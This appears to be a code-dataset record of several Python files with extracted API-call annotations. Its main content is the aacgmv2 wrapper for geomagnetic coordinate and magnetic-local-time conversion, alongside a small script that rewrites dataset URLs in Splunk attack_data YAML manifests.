args = parser.parse_args()
main(vars(args))
| [
"argparse.ArgumentParser"
] | [((543, 609), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Sistema CRUD de campus UMC."""'}), "(description='Sistema CRUD de campus UMC.')\n", (566, 609), False, 'import argparse\n')] |
import yaml
import glob
import os
import sys
import requests
import argparse
from os import path, walk
from pathlib import Path
import pathlib
from urllib.parse import urlparse
def load_file(file_path):
with open(file_path, 'r', encoding="utf-8") as stream:
try:
file = list(yaml.safe_load_all(stream))[0]
except yaml.YAMLError as exc:
print(exc)
sys.exit("ERROR: reading {0}".format(file_path))
return file
def write_file(obj, file_path):
    with open(os.path.join(os.path.dirname(__file__), '../datasets/', file_path), 'w+') as outfile:
        yaml.dump(obj, outfile, default_flow_style=False, sort_keys=False)
def write_new_object(obj, relative_path, branch):
new_obj = obj.copy()
new_obj['dataset'] = []
for dataset in obj['dataset']:
a = urlparse(dataset)
data_file_name = os.path.basename(a.path)
new_obj['dataset'].append('https://media.githubusercontent.com/media/splunk/attack_data/' + branch + '/datasets/' + os.path.dirname(relative_path) + '/' + data_file_name)
write_file(new_obj, relative_path)
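# Illustrative sketch (not part of the original script) of the URL rewrite done
# above; the branch name, dataset path and file name are hypothetical:
#   old: https://example.com/anything/windows-sysmon.log
#   new: https://media.githubusercontent.com/media/splunk/attack_data/<branch>/datasets/attack_techniques/T1003/atomic_red_team/windows-sysmon.log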
def load_objects(relative_path):
files = []
objs = []
manifest_files = os.path.join(os.path.dirname(__file__), '../', relative_path)
for file in sorted(glob.glob(manifest_files)):
p = pathlib.Path(file)
rel_path = str(pathlib.Path(*p.parts[2:]))
objs.append(load_file(file))
files.append(rel_path)
return objs, files
def convert_attack_data_objects(relative_path, branch):
attack_data_objs, attack_data_files = load_objects(relative_path)
counter = 0
for attack_data_obj in attack_data_objs:
write_new_object(attack_data_obj, attack_data_files[counter], branch)
counter += 1
def main(args):
parser = argparse.ArgumentParser(description="changes url links to datasets")
parser.add_argument("-b", "--branch", required=True, help="new branch")
    args = parser.parse_args(args)  # parse the argument list passed in by the caller
branch = args.branch
convert_attack_data_objects('datasets/attack_techniques/*/*/*.yml', branch)
convert_attack_data_objects('datasets/malware/*/*.yml', branch)
convert_attack_data_objects('datasets/suspicious_behaviour/*/*.yml', branch)
if __name__ == "__main__":
main(sys.argv[1:])
| [
"urllib.parse.urlparse",
"argparse.ArgumentParser",
"yaml.dump",
"pathlib.Path",
"yaml.safe_load_all",
"os.path.dirname",
"os.path.basename",
"glob.glob"
] | [((1810, 1878), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""changes url links to datasets"""'}), "(description='changes url links to datasets')\n", (1833, 1878), False, 'import argparse\n'), ((612, 678), 'yaml.dump', 'yaml.dump', (['obj', 'outfile'], {'default_flow_style': '(False)', 'sort_keys': '(False)'}), '(obj, outfile, default_flow_style=False, sort_keys=False)\n', (621, 678), False, 'import yaml\n'), ((832, 849), 'urllib.parse.urlparse', 'urlparse', (['dataset'], {}), '(dataset)\n', (840, 849), False, 'from urllib.parse import urlparse\n'), ((875, 899), 'os.path.basename', 'os.path.basename', (['a.path'], {}), '(a.path)\n', (891, 899), False, 'import os\n'), ((1217, 1242), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (1232, 1242), False, 'import os\n'), ((1289, 1314), 'glob.glob', 'glob.glob', (['manifest_files'], {}), '(manifest_files)\n', (1298, 1314), False, 'import glob\n'), ((1329, 1347), 'pathlib.Path', 'pathlib.Path', (['file'], {}), '(file)\n', (1341, 1347), False, 'import pathlib\n'), ((1371, 1397), 'pathlib.Path', 'pathlib.Path', (['*p.parts[2:]'], {}), '(*p.parts[2:])\n', (1383, 1397), False, 'import pathlib\n'), ((531, 556), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (546, 556), False, 'import os\n'), ((301, 327), 'yaml.safe_load_all', 'yaml.safe_load_all', (['stream'], {}), '(stream)\n', (319, 327), False, 'import yaml\n'), ((1024, 1054), 'os.path.dirname', 'os.path.dirname', (['relative_path'], {}), '(relative_path)\n', (1039, 1054), False, 'import os\n')] |
# Copyright (C) 2019 NRL
# Author: <NAME>
# Disclaimer: This code is under the MIT license, whose details can be found at
# the root in the LICENSE file
#
# -*- coding: utf-8 -*-
"""Pythonic wrappers for AACGM-V2 C functions.
"""
import datetime as dt
import numpy as np
import os
import sys
import aacgmv2
import aacgmv2._aacgmv2 as c_aacgmv2
from aacgmv2._aacgmv2 import TRACE, ALLOWTRACE, BADIDEA
def test_time(dtime):
""" Test the time input and ensure it is a dt.datetime object
Parameters
----------
dtime : (unknown)
Time input in an untested format
Returns
-------
dtime : (dt.datetime)
Time as a datetime object
Raises
------
ValueError if time is not a dt.date or dt.datetime object
"""
if isinstance(dtime, dt.date):
# Because datetime objects identify as both dt.date and dt.datetime,
# you need an extra test here to ensure you don't lose the time
# attributes
if not isinstance(dtime, dt.datetime):
dtime = dt.datetime.combine(dtime, dt.time(0))
elif not isinstance(dtime, dt.datetime):
raise ValueError('time variable (dtime) must be a datetime object')
return dtime
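# Illustrative usage sketch (not part of the original module):
#   >>> test_time(dt.date(2015, 1, 1))       # -> dt.datetime(2015, 1, 1, 0, 0)
#   >>> test_time(dt.datetime(2015, 1, 1))   # returned unchanged
#   >>> test_time("2015-01-01")              # raises ValueError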
def test_height(height, bit_code):
""" Test the input height and ensure it is appropriate for the method
Parameters
----------
height : (float)
Height to test in km
bit_code : (int)
Code string denoting method to use
Returns
-------
good_height : (boolean)
True if height and method are appropriate, False if not
Notes
-----
Appropriate altitude ranges for the different methods are explored in
Shepherd (2014). Summarized, they are:
Coefficients: 0-2000 km
Tracing: 0-1 Earth Radius
    Altitudes below zero will work, but will not provide a good representation
    of the magnetic field because they go beyond the intended scope of these
    coordinates.
    If you use the 'BADIDEA' code, you can bypass all constraints, but it
    is a Bad Idea! If you include a high enough altitude, the code may hang.
"""
# Test for heights that are allowed but not within the intended scope
# of the coordinate system. The routine will work, but the user should
# be aware that the results are not as reliable
if height < 0:
aacgmv2.logger.warning('conversion not intended for altitudes < 0 km')
# Test the conditions for using the coefficient method
if(height > aacgmv2.high_alt_coeff
and not (bit_code & (TRACE | ALLOWTRACE | BADIDEA))):
estr = ''.join(['coefficients are not valid for altitudes above ',
'{:.0f} km. You '.format(aacgmv2.high_alt_coeff),
'must either use field-line tracing (trace=True or',
' allowtrace=True) or indicate you know this is a',
' bad idea'])
aacgmv2.logger.error(estr)
return False
# Test the conditions for using the tracing method
if height > aacgmv2.high_alt_trace and not (bit_code & BADIDEA):
estr = ''.join(['these coordinates are not intended for the ',
'magnetosphere! You must indicate that you know ',
'this is a bad idea. If you continue, it is ',
'possible that the code will hang.'])
aacgmv2.logger.error(estr)
return False
return True
def set_coeff_path(igrf_file=False, coeff_prefix=False):
"""Sets the IGRF_COEFF and AACGMV_V2_DAT_PREFIX environment variables.
Parameters
----------
igrf_file : (str or bool)
Full filename of IGRF coefficient file, True to use
aacgmv2.IGRF_COEFFS, or False to leave as is. (default=False)
coeff_prefix : (str or bool)
Location and file prefix for aacgm coefficient files, True to use
aacgmv2.AACGM_V2_DAT_PREFIX, or False to leave as is. (default=False)
"""
# Define coefficient file prefix if requested
if coeff_prefix is not False:
# Use the default value, if one was not supplied (allow None to
        # comply with deprecated behaviour)
if coeff_prefix is True or coeff_prefix is None:
coeff_prefix = aacgmv2.AACGM_v2_DAT_PREFIX
if hasattr(os, "unsetenv"):
os.unsetenv('AACGM_v2_DAT_PREFIX')
else:
del os.environ['AACGM_v2_DAT_PREFIX']
os.environ['AACGM_v2_DAT_PREFIX'] = coeff_prefix
# Define IGRF file if requested
if igrf_file is not False:
# Use the default value, if one was not supplied (allow None to
# comply with depricated behaviour)
if igrf_file is True or igrf_file is None:
igrf_file = aacgmv2.IGRF_COEFFS
if hasattr(os, "unsetenv"):
os.unsetenv('IGRF_COEFFS')
else:
del os.environ['IGRF_COEFFS']
os.environ['IGRF_COEFFS'] = igrf_file
return
def convert_latlon(in_lat, in_lon, height, dtime, method_code="G2A"):
"""Converts between geomagnetic coordinates and AACGM coordinates
Parameters
----------
in_lat : (float)
Input latitude in degrees N (code specifies type of latitude)
in_lon : (float)
Input longitude in degrees E (code specifies type of longitude)
height : (float)
Altitude above the surface of the earth in km
dtime : (datetime)
Datetime for magnetic field
method_code : (str or int)
Bit code or string denoting which type(s) of conversion to perform
G2A - geographic (geodetic) to AACGM-v2
A2G - AACGM-v2 to geographic (geodetic)
TRACE - use field-line tracing, not coefficients
ALLOWTRACE - use trace only above 2000 km
BADIDEA - use coefficients above 2000 km
GEOCENTRIC - assume inputs are geocentric w/ RE=6371.2
(default is "G2A")
Returns
-------
out_lat : (float)
Output latitude in degrees N
out_lon : (float)
Output longitude in degrees E
out_r : (float)
Geocentric radial distance (R_Earth) or altitude above the surface of
the Earth (km)
Raises
------
ValueError if input is incorrect
RuntimeError if unable to set AACGMV2 datetime
"""
# Test time
dtime = test_time(dtime)
# Initialise output
lat_out = np.nan
lon_out = np.nan
r_out = np.nan
    # Set the coordinate conversion method code in bits
try:
bit_code = convert_str_to_bit(method_code.upper())
except AttributeError:
bit_code = method_code
if not isinstance(bit_code, int):
raise ValueError("unknown method code {:}".format(method_code))
# Test height that may or may not cause failure
if not test_height(height, bit_code):
return lat_out, lon_out, r_out
# Test latitude range
if abs(in_lat) > 90.0:
# Allow latitudes with a small deviation from the maximum
# (+/- 90 degrees) to be set to 90
if abs(in_lat) > 90.1:
raise ValueError('unrealistic latitude')
in_lat = np.sign(in_lat) * 90.0
# Constrain longitudes between -180 and 180
in_lon = ((in_lon + 180.0) % 360.0) - 180.0
# Set current date and time
try:
c_aacgmv2.set_datetime(dtime.year, dtime.month, dtime.day, dtime.hour,
dtime.minute, dtime.second)
except (TypeError, RuntimeError) as err:
raise RuntimeError("cannot set time for {:}: {:}".format(dtime, err))
# convert location
try:
lat_out, lon_out, r_out = c_aacgmv2.convert(in_lat, in_lon, height,
bit_code)
except Exception:
err = sys.exc_info()[0]
estr = "unable to perform conversion at {:.1f},".format(in_lat)
estr = "{:s}{:.1f} {:.1f} km, {:} ".format(estr, in_lon, height, dtime)
estr = "{:s}using method {:}: {:}".format(estr, bit_code, err)
aacgmv2.logger.warning(estr)
pass
return lat_out, lon_out, r_out
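# Illustrative usage sketch (not part of the original module); the geographic
# location and date are hypothetical:
#   >>> mlat, mlon, r = convert_latlon(45.5, -105.0, 300.0,
#   ...                                dt.datetime(2015, 1, 1), "G2A|TRACE")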
def convert_latlon_arr(in_lat, in_lon, height, dtime, method_code="G2A"):
"""Converts between geomagnetic coordinates and AACGM coordinates.
Parameters
----------
in_lat : (np.ndarray or list or float)
Input latitude in degrees N (method_code specifies type of latitude)
in_lon : (np.ndarray or list or float)
Input longitude in degrees E (method_code specifies type of longitude)
height : (np.ndarray or list or float)
Altitude above the surface of the earth in km
dtime : (datetime)
Single datetime object for magnetic field
method_code : (int or str)
Bit code or string denoting which type(s) of conversion to perform
G2A - geographic (geodetic) to AACGM-v2
A2G - AACGM-v2 to geographic (geodetic)
TRACE - use field-line tracing, not coefficients
ALLOWTRACE - use trace only above 2000 km
BADIDEA - use coefficients above 2000 km
GEOCENTRIC - assume inputs are geocentric w/ RE=6371.2
(default = "G2A")
Returns
-------
out_lat : (np.ndarray)
Output latitudes in degrees N
out_lon : (np.ndarray)
Output longitudes in degrees E
out_r : (np.ndarray)
Geocentric radial distance (R_Earth) or altitude above the surface of
the Earth (km)
Raises
------
ValueError if input is incorrect
RuntimeError if unable to set AACGMV2 datetime
Notes
-----
At least one of in_lat, in_lon, and height must be a list or array.
If errors are encountered, NaN or Inf will be included in the input so
that all successful calculations are returned. To select only good values
use a function like `np.isfinite`.
Multi-dimensional arrays are not allowed.
"""
# Recast the data as numpy arrays
in_lat = np.array(in_lat)
in_lon = np.array(in_lon)
height = np.array(height)
# If one or two of these elements is a float, int, or single element array,
# create an array equal to the length of the longest input
test_array = np.array([len(in_lat.shape), len(in_lon.shape),
len(height.shape)])
if test_array.max() > 1:
raise ValueError("unable to process multi-dimensional arrays")
else:
if test_array.max() == 0:
aacgmv2.logger.info("".join(["for a single location, consider ",
"using convert_latlon or ",
"get_aacgm_coord"]))
in_lat = np.array([in_lat])
in_lon = np.array([in_lon])
height = np.array([height])
else:
max_len = max([len(arr) for i, arr in enumerate([in_lat, in_lon,
height])
if test_array[i] > 0])
if not test_array[0] or (len(in_lat) == 1 and max_len > 1):
in_lat = np.full(shape=(max_len,), fill_value=in_lat)
if not test_array[1] or (len(in_lon) == 1 and max_len > 1):
in_lon = np.full(shape=(max_len,), fill_value=in_lon)
if not test_array[2] or (len(height) == 1 and max_len > 1):
height = np.full(shape=(max_len,), fill_value=height)
# Ensure that lat, lon, and height are the same length or if the lengths
# differ that the different ones contain only a single value
if not (in_lat.shape == in_lon.shape and in_lat.shape == height.shape):
raise ValueError('lat, lon, and height arrays are mismatched')
# Test time
dtime = test_time(dtime)
# Initialise output
lat_out = np.full(shape=in_lat.shape, fill_value=np.nan)
lon_out = np.full(shape=in_lon.shape, fill_value=np.nan)
r_out = np.full(shape=height.shape, fill_value=np.nan)
# Test and set the conversion method code
try:
bit_code = convert_str_to_bit(method_code.upper())
except AttributeError:
bit_code = method_code
if not isinstance(bit_code, int):
raise ValueError("unknown method code {:}".format(method_code))
# Test height
if not test_height(np.nanmax(height), bit_code):
return lat_out, lon_out, r_out
# Test latitude range
if np.abs(in_lat).max() > 90.0:
if np.abs(in_lat).max() > 90.1:
raise ValueError('unrealistic latitude')
in_lat = np.clip(in_lat, -90.0, 90.0)
# Constrain longitudes between -180 and 180
in_lon = ((in_lon + 180.0) % 360.0) - 180.0
# Set current date and time
try:
c_aacgmv2.set_datetime(dtime.year, dtime.month, dtime.day, dtime.hour,
dtime.minute, dtime.second)
except (TypeError, RuntimeError) as err:
raise RuntimeError("cannot set time for {:}: {:}".format(dtime, err))
try:
lat_out, lon_out, r_out, bad_ind = c_aacgmv2.convert_arr(list(in_lat),
list(in_lon),
list(height),
bit_code)
# Cast the output as numpy arrays or masks
lat_out = np.array(lat_out)
lon_out = np.array(lon_out)
r_out = np.array(r_out)
bad_ind = np.array(bad_ind) >= 0
# Replace any bad indices with NaN, casting output as numpy arrays
if np.any(bad_ind):
lat_out[bad_ind] = np.nan
lon_out[bad_ind] = np.nan
r_out[bad_ind] = np.nan
except SystemError as serr:
aacgmv2.logger.warning('C Error encountered: {:}'.format(serr))
return lat_out, lon_out, r_out
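# Illustrative usage sketch (not part of the original module); the inputs are
# hypothetical. Scalars are broadcast to the length of the longest array input:
#   >>> mlat, mlon, r = convert_latlon_arr([45.5, 60.0], [-105.0, 25.0], 300.0,
#   ...                                    dt.datetime(2015, 1, 1), "G2A")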
def get_aacgm_coord(glat, glon, height, dtime, method="ALLOWTRACE"):
"""Get AACGM latitude, longitude, and magnetic local time
Parameters
----------
glat : (float)
Geodetic latitude in degrees N
glon : (float)
Geodetic longitude in degrees E
height : (float)
Altitude above the surface of the earth in km
dtime : (datetime)
Date and time to calculate magnetic location
method : (str)
String denoting which type(s) of conversion to perform
TRACE - use field-line tracing, not coefficients
ALLOWTRACE - use trace only above 2000 km
BADIDEA - use coefficients above 2000 km
GEOCENTRIC - assume inputs are geocentric w/ RE=6371.2
(default = "TRACE")
Returns
-------
mlat : (float)
magnetic latitude in degrees N
mlon : (float)
magnetic longitude in degrees E
mlt : (float)
magnetic local time in hours
"""
# Initialize method code
method_code = "G2A|{:s}".format(method)
# Get magnetic lat and lon.
mlat, mlon, _ = convert_latlon(glat, glon, height, dtime,
method_code=method_code)
# Get magnetic local time (output is always an array, so extract value)
mlt = np.nan if np.isnan(mlon) else convert_mlt(mlon, dtime, m2a=False)[0]
return mlat, mlon, mlt
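# Illustrative usage sketch (not part of the original module); the inputs are
# hypothetical:
#   >>> mlat, mlon, mlt = get_aacgm_coord(45.5, -105.0, 300.0,
#   ...                                   dt.datetime(2015, 1, 1))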
def get_aacgm_coord_arr(glat, glon, height, dtime, method="ALLOWTRACE"):
"""Get AACGM latitude, longitude, and magnetic local time
Parameters
----------
glat : (np.array or list)
Geodetic latitude in degrees N
glon : (np.array or list)
Geodetic longitude in degrees E
height : (np.array or list)
Altitude above the surface of the earth in km
dtime : (datetime)
Date and time to calculate magnetic location
method : (str)
String denoting which type(s) of conversion to perform
TRACE - use field-line tracing, not coefficients
ALLOWTRACE - use trace only above 2000 km
BADIDEA - use coefficients above 2000 km
GEOCENTRIC - assume inputs are geocentric w/ RE=6371.2
(default = "TRACE")
(default = "TRACE")
Returns
-------
mlat : (float)
magnetic latitude in degrees N
mlon : (float)
magnetic longitude in degrees E
mlt : (float)
magnetic local time in hours
"""
# Initialize method code
method_code = "G2A|{:s}".format(method)
# Get magnetic lat and lon.
mlat, mlon, _ = convert_latlon_arr(glat, glon, height, dtime,
method_code=method_code)
if np.any(np.isfinite(mlon)):
# Get magnetic local time
mlt = convert_mlt(mlon, dtime, m2a=False)
else:
mlt = np.full(shape=len(mlat), fill_value=np.nan)
return mlat, mlon, mlt
def convert_str_to_bit(method_code):
"""convert string code specification to bit code specification
Parameters
----------
method_code : (str)
Bitwise code for passing options into converter (default=0)
G2A - geographic (geodetic) to AACGM-v2
A2G - AACGM-v2 to geographic (geodetic)
TRACE - use field-line tracing, not coefficients
ALLOWTRACE - use trace only above 2000 km
BADIDEA - use coefficients above 2000 km
GEOCENTRIC - assume inputs are geocentric w/ RE=6371.2
Returns
-------
bit_code : (int)
Method code specification in bits
Notes
-----
    Multiple codes should be separated by pipes '|'. Invalid parts of the code
are ignored and no code defaults to 'G2A'.
"""
convert_code = {"G2A": c_aacgmv2.G2A, "A2G": c_aacgmv2.A2G,
"TRACE": c_aacgmv2.TRACE, "BADIDEA": c_aacgmv2.BADIDEA,
"GEOCENTRIC": c_aacgmv2.GEOCENTRIC,
"ALLOWTRACE": c_aacgmv2.ALLOWTRACE}
# Force upper case, remove any spaces, and split along pipes
method_codes = method_code.upper().replace(" ", "").split("|")
# Add the valid parts of the code, invalid elements are ignored
bit_code = sum([convert_code[k] for k in method_codes
if k in convert_code.keys()])
return bit_code
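# Illustrative sketch (not part of the original module): recognized tokens are
# summed into a bit code, unknown tokens are ignored, and an empty string
# falls back to 'G2A' as described in the docstring above:
#   >>> convert_str_to_bit("G2A|TRACE")         # c_aacgmv2.G2A + c_aacgmv2.TRACE
#   >>> convert_str_to_bit("a2g | geocentric")  # case and spaces are normalized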
def convert_bool_to_bit(a2g=False, trace=False, allowtrace=False,
badidea=False, geocentric=False):
"""convert boolian flags to bit code specification
Parameters
----------
a2g : (bool)
True for AACGM-v2 to geographic (geodetic), False otherwise
(default=False)
trace : (bool)
If True, use field-line tracing, not coefficients (default=False)
allowtrace : (bool)
If True, use trace only above 2000 km (default=False)
badidea : (bool)
If True, use coefficients above 2000 km (default=False)
geocentric : (bool)
True for geodetic, False for geocentric w/RE=6371.2 (default=False)
Returns
-------
bit_code : (int)
code specification in bits
"""
bit_code = c_aacgmv2.A2G if a2g else c_aacgmv2.G2A
if trace:
bit_code += c_aacgmv2.TRACE
if allowtrace:
bit_code += c_aacgmv2.ALLOWTRACE
if badidea:
bit_code += c_aacgmv2.BADIDEA
if geocentric:
bit_code += c_aacgmv2.GEOCENTRIC
return bit_code
def convert_mlt(arr, dtime, m2a=False):
"""Converts between magnetic local time (MLT) and AACGM-v2 longitude
Parameters
----------
arr : (array-like or float)
Magnetic longitudes (degrees E) or MLTs (hours) to convert
dtime : (array-like or datetime.datetime)
Date and time for MLT conversion in Universal Time (UT).
m2a : (bool)
Convert MLT to AACGM-v2 longitude (True) or magnetic longitude to MLT
(False). (default=False)
Returns
-------
out : (np.ndarray)
Converted coordinates/MLT in degrees E or hours (as appropriate)
Notes
-----
    This routine was previously based on Laundal et al. 2016, but now uses the
improved calculation available in AACGM-V2.4.
"""
arr = np.asarray(arr)
if arr.shape == ():
arr = np.array([arr])
if len(arr.shape) > 1:
raise ValueError("unable to process multi-dimensional arrays")
# Test time
try:
dtime = test_time(dtime)
years = [dtime.year for dd in arr]
months = [dtime.month for dd in arr]
days = [dtime.day for dd in arr]
hours = [dtime.hour for dd in arr]
minutes = [dtime.minute for dd in arr]
seconds = [dtime.second for dd in arr]
except ValueError as verr:
dtime = np.asarray(dtime)
if dtime.shape == ():
raise ValueError(verr)
elif dtime.shape != arr.shape:
raise ValueError("array input for datetime and MLon/MLT must match")
years = [dd.year for dd in dtime]
months = [dd.month for dd in dtime]
days = [dd.day for dd in dtime]
hours = [dd.hour for dd in dtime]
minutes = [dd.minute for dd in dtime]
seconds = [dd.second for dd in dtime]
arr = list(arr)
# Calculate desired location, C routines set date and time
if m2a:
# Get the magnetic longitude
if len(arr) == 1:
out = c_aacgmv2.inv_mlt_convert(years[0], months[0], days[0],
hours[0], minutes[0], seconds[0],
arr[0])
else:
out = c_aacgmv2.inv_mlt_convert_arr(years, months, days, hours,
minutes, seconds, arr)
else:
# Get magnetic local time
if len(arr) == 1:
out = c_aacgmv2.mlt_convert(years[0], months[0], days[0], hours[0],
minutes[0], seconds[0], arr[0])
out = np.array([out])
else:
out = np.array(c_aacgmv2.mlt_convert_arr(years, months, days, hours,
minutes, seconds, arr))
return out
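# Illustrative usage sketch (not part of the original module); the values are
# hypothetical:
#   >>> mlt = convert_mlt([12.0, 75.0], dt.datetime(2015, 1, 1))      # mlon -> MLT
#   >>> mlon = convert_mlt(3.5, dt.datetime(2015, 1, 1), m2a=True)    # MLT -> mlon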
| [
"numpy.clip",
"numpy.array",
"sys.exc_info",
"numpy.isfinite",
"aacgmv2.logger.error",
"os.unsetenv",
"aacgmv2._aacgmv2.set_datetime",
"datetime.time",
"aacgmv2._aacgmv2.mlt_convert",
"numpy.asarray",
"numpy.nanmax",
"aacgmv2._aacgmv2.mlt_convert_arr",
"aacgmv2._aacgmv2.convert",
"numpy.abs",
"aacgmv2._aacgmv2.inv_mlt_convert_arr",
"aacgmv2._aacgmv2.inv_mlt_convert",
"numpy.any",
"numpy.isnan",
"numpy.sign",
"numpy.full",
"aacgmv2.logger.warning"
] | [((9933, 9949), 'numpy.array', 'np.array', (['in_lat'], {}), '(in_lat)\n', (9941, 9949), True, 'import numpy as np\n'), ((9963, 9979), 'numpy.array', 'np.array', (['in_lon'], {}), '(in_lon)\n', (9971, 9979), True, 'import numpy as np\n'), ((9993, 10009), 'numpy.array', 'np.array', (['height'], {}), '(height)\n', (10001, 10009), True, 'import numpy as np\n'), ((11752, 11798), 'numpy.full', 'np.full', ([], {'shape': 'in_lat.shape', 'fill_value': 'np.nan'}), '(shape=in_lat.shape, fill_value=np.nan)\n', (11759, 11798), True, 'import numpy as np\n'), ((11813, 11859), 'numpy.full', 'np.full', ([], {'shape': 'in_lon.shape', 'fill_value': 'np.nan'}), '(shape=in_lon.shape, fill_value=np.nan)\n', (11820, 11859), True, 'import numpy as np\n'), ((11872, 11918), 'numpy.full', 'np.full', ([], {'shape': 'height.shape', 'fill_value': 'np.nan'}), '(shape=height.shape, fill_value=np.nan)\n', (11879, 11918), True, 'import numpy as np\n'), ((19913, 19928), 'numpy.asarray', 'np.asarray', (['arr'], {}), '(arr)\n', (19923, 19928), True, 'import numpy as np\n'), ((2351, 2421), 'aacgmv2.logger.warning', 'aacgmv2.logger.warning', (['"""conversion not intended for altitudes < 0 km"""'], {}), "('conversion not intended for altitudes < 0 km')\n", (2373, 2421), False, 'import aacgmv2\n'), ((2930, 2956), 'aacgmv2.logger.error', 'aacgmv2.logger.error', (['estr'], {}), '(estr)\n', (2950, 2956), False, 'import aacgmv2\n'), ((3391, 3417), 'aacgmv2.logger.error', 'aacgmv2.logger.error', (['estr'], {}), '(estr)\n', (3411, 3417), False, 'import aacgmv2\n'), ((7300, 7402), 'aacgmv2._aacgmv2.set_datetime', 'c_aacgmv2.set_datetime', (['dtime.year', 'dtime.month', 'dtime.day', 'dtime.hour', 'dtime.minute', 'dtime.second'], {}), '(dtime.year, dtime.month, dtime.day, dtime.hour,\n dtime.minute, dtime.second)\n', (7322, 7402), True, 'import aacgmv2._aacgmv2 as c_aacgmv2\n'), ((7620, 7671), 'aacgmv2._aacgmv2.convert', 'c_aacgmv2.convert', (['in_lat', 'in_lon', 'height', 'bit_code'], {}), '(in_lat, in_lon, height, bit_code)\n', (7637, 7671), True, 'import aacgmv2._aacgmv2 as c_aacgmv2\n'), ((12487, 12515), 'numpy.clip', 'np.clip', (['in_lat', '(-90.0)', '(90.0)'], {}), '(in_lat, -90.0, 90.0)\n', (12494, 12515), True, 'import numpy as np\n'), ((12663, 12765), 'aacgmv2._aacgmv2.set_datetime', 'c_aacgmv2.set_datetime', (['dtime.year', 'dtime.month', 'dtime.day', 'dtime.hour', 'dtime.minute', 'dtime.second'], {}), '(dtime.year, dtime.month, dtime.day, dtime.hour,\n dtime.minute, dtime.second)\n', (12685, 12765), True, 'import aacgmv2._aacgmv2 as c_aacgmv2\n'), ((13308, 13325), 'numpy.array', 'np.array', (['lat_out'], {}), '(lat_out)\n', (13316, 13325), True, 'import numpy as np\n'), ((13344, 13361), 'numpy.array', 'np.array', (['lon_out'], {}), '(lon_out)\n', (13352, 13361), True, 'import numpy as np\n'), ((13378, 13393), 'numpy.array', 'np.array', (['r_out'], {}), '(r_out)\n', (13386, 13393), True, 'import numpy as np\n'), ((13522, 13537), 'numpy.any', 'np.any', (['bad_ind'], {}), '(bad_ind)\n', (13528, 13537), True, 'import numpy as np\n'), ((15091, 15105), 'numpy.isnan', 'np.isnan', (['mlon'], {}), '(mlon)\n', (15099, 15105), True, 'import numpy as np\n'), ((16469, 16486), 'numpy.isfinite', 'np.isfinite', (['mlon'], {}), '(mlon)\n', (16480, 16486), True, 'import numpy as np\n'), ((19967, 19982), 'numpy.array', 'np.array', (['[arr]'], {}), '([arr])\n', (19975, 19982), True, 'import numpy as np\n'), ((4337, 4371), 'os.unsetenv', 'os.unsetenv', (['"""AACGM_v2_DAT_PREFIX"""'], {}), "('AACGM_v2_DAT_PREFIX')\n", (4348, 4371), False, 
'import os\n'), ((4821, 4847), 'os.unsetenv', 'os.unsetenv', (['"""IGRF_COEFFS"""'], {}), "('IGRF_COEFFS')\n", (4832, 4847), False, 'import os\n'), ((7130, 7145), 'numpy.sign', 'np.sign', (['in_lat'], {}), '(in_lat)\n', (7137, 7145), True, 'import numpy as np\n'), ((8009, 8037), 'aacgmv2.logger.warning', 'aacgmv2.logger.warning', (['estr'], {}), '(estr)\n', (8031, 8037), False, 'import aacgmv2\n'), ((10640, 10658), 'numpy.array', 'np.array', (['[in_lat]'], {}), '([in_lat])\n', (10648, 10658), True, 'import numpy as np\n'), ((10680, 10698), 'numpy.array', 'np.array', (['[in_lon]'], {}), '([in_lon])\n', (10688, 10698), True, 'import numpy as np\n'), ((10720, 10738), 'numpy.array', 'np.array', (['[height]'], {}), '([height])\n', (10728, 10738), True, 'import numpy as np\n'), ((12245, 12262), 'numpy.nanmax', 'np.nanmax', (['height'], {}), '(height)\n', (12254, 12262), True, 'import numpy as np\n'), ((13412, 13429), 'numpy.array', 'np.array', (['bad_ind'], {}), '(bad_ind)\n', (13420, 13429), True, 'import numpy as np\n'), ((20454, 20471), 'numpy.asarray', 'np.asarray', (['dtime'], {}), '(dtime)\n', (20464, 20471), True, 'import numpy as np\n'), ((21096, 21198), 'aacgmv2._aacgmv2.inv_mlt_convert', 'c_aacgmv2.inv_mlt_convert', (['years[0]', 'months[0]', 'days[0]', 'hours[0]', 'minutes[0]', 'seconds[0]', 'arr[0]'], {}), '(years[0], months[0], days[0], hours[0], minutes[0\n ], seconds[0], arr[0])\n', (21121, 21198), True, 'import aacgmv2._aacgmv2 as c_aacgmv2\n'), ((21314, 21399), 'aacgmv2._aacgmv2.inv_mlt_convert_arr', 'c_aacgmv2.inv_mlt_convert_arr', (['years', 'months', 'days', 'hours', 'minutes', 'seconds', 'arr'], {}), '(years, months, days, hours, minutes, seconds, arr\n )\n', (21343, 21399), True, 'import aacgmv2._aacgmv2 as c_aacgmv2\n'), ((21531, 21628), 'aacgmv2._aacgmv2.mlt_convert', 'c_aacgmv2.mlt_convert', (['years[0]', 'months[0]', 'days[0]', 'hours[0]', 'minutes[0]', 'seconds[0]', 'arr[0]'], {}), '(years[0], months[0], days[0], hours[0], minutes[0],\n seconds[0], arr[0])\n', (21552, 21628), True, 'import aacgmv2._aacgmv2 as c_aacgmv2\n'), ((21683, 21698), 'numpy.array', 'np.array', (['[out]'], {}), '([out])\n', (21691, 21698), True, 'import numpy as np\n'), ((1065, 1075), 'datetime.time', 'dt.time', (['(0)'], {}), '(0)\n', (1072, 1075), True, 'import datetime as dt\n'), ((7760, 7774), 'sys.exc_info', 'sys.exc_info', ([], {}), '()\n', (7772, 7774), False, 'import sys\n'), ((11048, 11092), 'numpy.full', 'np.full', ([], {'shape': '(max_len,)', 'fill_value': 'in_lat'}), '(shape=(max_len,), fill_value=in_lat)\n', (11055, 11092), True, 'import numpy as np\n'), ((11190, 11234), 'numpy.full', 'np.full', ([], {'shape': '(max_len,)', 'fill_value': 'in_lon'}), '(shape=(max_len,), fill_value=in_lon)\n', (11197, 11234), True, 'import numpy as np\n'), ((11332, 11376), 'numpy.full', 'np.full', ([], {'shape': '(max_len,)', 'fill_value': 'height'}), '(shape=(max_len,), fill_value=height)\n', (11339, 11376), True, 'import numpy as np\n'), ((12348, 12362), 'numpy.abs', 'np.abs', (['in_lat'], {}), '(in_lat)\n', (12354, 12362), True, 'import numpy as np\n'), ((21740, 21816), 'aacgmv2._aacgmv2.mlt_convert_arr', 'c_aacgmv2.mlt_convert_arr', (['years', 'months', 'days', 'hours', 'minutes', 'seconds', 'arr'], 